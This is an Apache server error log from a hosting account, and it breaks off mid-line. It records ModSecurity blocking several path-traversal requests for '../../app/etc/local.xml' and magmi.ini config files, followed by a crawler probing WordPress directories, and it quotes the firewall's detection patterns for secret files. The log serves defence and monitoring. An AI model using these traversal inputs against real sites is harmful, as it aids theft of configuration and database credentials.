Nov 05 02:08:45.325106 2023] [:error] [pid 32259:tid 140299545294592] [client 104.248.229.153:34318] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/amfeed/main/download"] [unique_id "ZUc_ffDp5LgkYcYLjZxG3AAAAAI"] [Sun Nov 05 02:08:45.327918 2023] [:error] [pid 32260:tid 140299435226880] [client 104.248.229.153:34320] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi-importer/web/download_file.php"] [unique_id "ZUc_fWcWRZuS0EvqLDkEnwAAAEc"] [Sun Nov 05 02:08:45.330934 2023] [:error] [pid 11019:tid 140299393263360] [client 104.248.229.153:34322] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: ../../app/etc/local.xml"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "investigacionperu.com"] [uri "/magmi/web/download_file.php"] [unique_id "ZUc_fUKacOVwzde4VOkGKgAAAUw"] [Sun Nov 05 02:08:45.334121 2023] [:error] [pid 11020:tid 140299460404992] [client 104.248.229.153:34324] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi-importer/conf/magmi.ini"] [unique_id "ZUc_fR3i54ilZsKhze6cOQAAAYQ"] [Sun Nov 05 02:08:45.337226 2023] [:error] [pid 11019:tid 140299342907136] [client 104.248.229.153:34326] [client 104.248.229.153] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/magmi/conf/magmi.ini"] [unique_id "ZUc_fUKacOVwzde4VOkGKwAAAVI"] [Sun Nov 05 03:13:28.765699 2023] [ssl:warn] [pid 14836:tid 140183003699072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 03:13:36.945021 2023] [ssl:warn] [pid 14839:tid 140183003699072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 03:13:37.430048 2023] [ssl:warn] [pid 14839:tid 140183003699072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 03:13:39.132841 2023] [ssl:warn] [pid 14839:tid 140183003699072] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 03:13:41.433739 2023] [ssl:warn] [pid 15254:tid 140481071028096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 03:13:53.612313 2023] [ssl:warn] [pid 15258:tid 140481071028096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 09:05:00.928801 2023] [autoindex:error] [pid 15277:tid 140480637486848] [client 103.15.216.133:40180] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/2023/06/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/2023/06/index.php [Sun Nov 05 11:36:50.700129 2023] [ssl:warn] [pid 15258:tid 140481071028096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 12:06:01.765714 2023] [ssl:warn] [pid 15258:tid 140481071028096] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Sun Nov 05 15:52:36.156542 2023] [autoindex:error] [pid 2572:tid 140480679450368] [client 91.92.242.136:47852] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:52:45.075009 2023] [:error] [pid 2572:tid 140480696235776] [client 91.92.242.136:47854] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sun Nov 05 15:53:36.288484 2023] [autoindex:error] [pid 2442:tid 140480620701440] [client 91.92.242.136:47890] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:53:43.469186 2023] [autoindex:error] [pid 2442:tid 140480888284928] [client 91.92.242.136:47898] AH01276: Cannot serve directory /home/investig/public_html/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:53:49.474285 2023] [autoindex:error] [pid 2441:tid 140480788555520] [client 91.92.242.136:47906] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:53:59.857285 2023] [autoindex:error] [pid 2442:tid 140480796948224] [client 91.92.242.136:47916] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:14.425388 2023] [autoindex:error] [pid 2442:tid 140480771770112] [client 91.92.242.136:47924] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:20.202488 2023] [autoindex:error] [pid 2443:tid 140480671057664] [client 91.92.242.136:47934] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:23.142490 2023] [autoindex:error] [pid 2441:tid 140480771770112] [client 91.92.242.136:47938] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ectoplasm/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:28.330231 2023] [autoindex:error] [pid 2441:tid 140480729806592] [client 91.92.242.136:47942] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/midnight/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:34.871951 2023] [autoindex:error] [pid 2442:tid 140480687843072] [client 91.92.242.136:47948] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:54:43.460417 2023] [autoindex:error] [pid 2441:tid 140480671057664] [client 91.92.242.136:47956] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/ocean/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:55:08.231020 2023] [autoindex:error] [pid 2572:tid 140480704628480] [client 91.92.242.136:47974] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:55:16.634354 2023] [autoindex:error] [pid 2441:tid 140480746592000] [client 91.92.242.136:47978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:55:21.919471 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:47982] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:55:28.805782 2023] [autoindex:error] [pid 2572:tid 140480796948224] [client 91.92.242.136:47990] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:55:36.997004 2023] [autoindex:error] [pid 2572:tid 140480654272256] [client 91.92.242.136:47994] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:11.021764 2023] [autoindex:error] [pid 2443:tid 140480612308736] [client 91.92.242.136:48022] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:15.332137 2023] [autoindex:error] [pid 2443:tid 140480788555520] [client 91.92.242.136:48026] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:19.723420 2023] [autoindex:error] [pid 2443:tid 140480879892224] [client 91.92.242.136:48030] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:22.542019 2023] [autoindex:error] [pid 2443:tid 140480780162816] [client 91.92.242.136:48034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:27.801538 2023] [autoindex:error] [pid 2443:tid 140480754984704] [client 91.92.242.136:48040] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:38.629047 2023] [autoindex:error] [pid 2572:tid 140480679450368] [client 91.92.242.136:48044] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:42.666802 2023] [autoindex:error] [pid 2442:tid 140480662664960] [client 91.92.242.136:48050] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:51.665102 2023] [autoindex:error] [pid 2443:tid 140480662664960] [client 91.92.242.136:48058] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:56:58.368783 2023] [autoindex:error] [pid 2443:tid 140480696235776] [client 91.92.242.136:48066] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:05.285890 2023] [autoindex:error] [pid 2443:tid 140480637486848] [client 91.92.242.136:48074] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:12.843200 2023] [autoindex:error] [pid 2443:tid 140480645879552] [client 91.92.242.136:48078] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:17.247153 2023] [autoindex:error] [pid 2442:tid 140480796948224] [client 91.92.242.136:48088] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:27.569417 2023] [autoindex:error] [pid 2572:tid 140480796948224] [client 91.92.242.136:48094] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:32.791393 2023] [autoindex:error] [pid 2442:tid 140480771770112] [client 91.92.242.136:48104] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:37.284878 2023] [autoindex:error] [pid 2442:tid 140480729806592] [client 91.92.242.136:48108] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:43.759466 2023] [autoindex:error] [pid 2442:tid 140480687843072] [client 91.92.242.136:48112] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:47.588261 2023] [autoindex:error] [pid 2443:tid 140480780162816] [client 91.92.242.136:48116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:55.565984 2023] [autoindex:error] [pid 2441:tid 140480679450368] [client 91.92.242.136:48124] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:57:58.379763 2023] [autoindex:error] [pid 2442:tid 140480645879552] [client 91.92.242.136:48128] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:18.514288 2023] [autoindex:error] [pid 2572:tid 140480645879552] [client 91.92.242.136:48146] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:28.654583 2023] [autoindex:error] [pid 2572:tid 140480738199296] [client 91.92.242.136:48150] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:32.967781 2023] [autoindex:error] [pid 2572:tid 140480637486848] [client 91.92.242.136:48154] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:43.060790 2023] [autoindex:error] [pid 2442:tid 140480788555520] [client 91.92.242.136:48158] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Net/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:51.694241 2023] [autoindex:error] [pid 2443:tid 140480746592000] [client 91.92.242.136:48168] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Parse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:58:57.798684 2023] [autoindex:error] [pid 2572:tid 140480888284928] [client 91.92.242.136:48176] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/Declaration/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:01.378022 2023] [autoindex:error] [pid 2443:tid 140480729806592] [client 91.92.242.136:48182] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:03.494144 2023] [autoindex:error] [pid 2442:tid 140480704628480] [client 91.92.242.136:48188] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sun Nov 05 15:59:08.058682 2023] [autoindex:error] [pid 2442:tid 140480713021184] 